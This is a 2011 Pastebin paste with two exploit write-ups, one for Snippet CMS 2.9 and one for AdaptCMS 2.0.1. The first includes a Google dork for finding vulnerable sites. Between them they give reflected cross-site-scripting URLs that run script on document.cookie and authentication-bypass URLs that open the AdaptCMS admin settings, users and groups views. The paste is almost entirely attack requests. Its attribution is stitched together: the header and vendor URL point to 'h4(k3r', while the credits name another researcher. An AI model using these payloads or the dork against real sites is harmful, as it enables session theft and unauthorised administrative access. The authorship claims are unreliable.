Advertisement
ugo22g

XSS

Sep 26th, 2011
226
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.25 KB | None | 0 0
  1. Exploit Title: Snippet CMS v2.9 XSS Vulnerability
  2. Google Dork: "Powered by h4(k3r"
  3. Date: 23.09.2011
  4. Author: h4(k3r
  5. Version: 2.9
  6. Tested on: Unix Server
  7.  
  8. -------------------------------------------------------------------------------------------------------
  9. Exploits
  10.  
  11. http://localhost/path/?page=gallery&showgal=CoBRa_21&showimg="><script>alert(document.cookie)</script>
  12.  
  13. http://localhost/path/?page=gallery&showgal=CoBRa_21&showimg="><script>alert(/CoBRa_21/)</script>
  14.  
  15. -------------------------------------------------------------------------------------------------------
  16.  
  17.  
  18. Advisory: AdaptCMS 2.0.1 Multiple security vulnerabilities
  19. Advisory ID: SSCHADV2011-018
  20. Author: h4(k3r
  21. Affected Software: Successfully tested on AdaptCMS 2.0.1
  22. Vendor URL: http://h4ck3r.ze-forum.com
  23. Vendor Status: fixed
  24. CVE-ID: -
  25.  
  26. ==========================
  27. Vulnerability Description:
  28. ==========================
  29.  
  30. AdaptCMS 2.0.1 is prone to multiple security vulnerabilities
  31.  
  32. ==================
  33. Technical Details:
  34. ==================
  35.  
  36. Cross-site Scripting
  37.  
  38. http://<target>/AdaptCMS/admin.php?view=</script><script>alert(document.cookie)</script>
  39. http://<target>/AdaptCMS/admin.php?view=share&do=</script><script>alert(document.cookie)</script>
  40. http://<target>/AdaptCMS//?'</script><script>alert(document.cookie)</script>
  41. http://<target>/AdaptCMS//index.php?'</script><script>alert(document.cookie)</script>
  42.  
  43. Authentication bypass / Information Disclosure
  44.  
  45. http://<target>/AdaptCMS/admin.php?view=/&view=settings
  46. http://<target>/AdaptCMS/admin.php?view=/&view=users
  47. http://<target>/AdaptCMS/admin.php?view=/&view=groups
  48. http://<target>/AdaptCMS/admin.php?view=/&view=levels
  49. http://<target>/AdaptCMS/admin.php?view=/&view=stats
  50.  
  51. =========
  52. Solution:
  53. =========
  54.  
  55. "Get the latest AdaptCMS Files" from the admin area
  56.  
  57. ====================
  58. Disclosure Timeline:
  59. ====================
  60.  
  61. 24-Sep-2011 - informed developers
  62. 24-Sep-2011 - Release date of this security advisory
  63. 25-Sep-2011 - fixed by vendor
  64. 25-Sep-2011 - post on BugTraq
  65.  
  66. ========
  67. Credits:
  68. ========
  69.  
  70. Vulnerabilities found and advisory written by Stefan Schurtz.
  71.  
  72. ===========
  73. References:
  74. ===========
  75.  
  76. http://h4ck3r.ze-forum.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement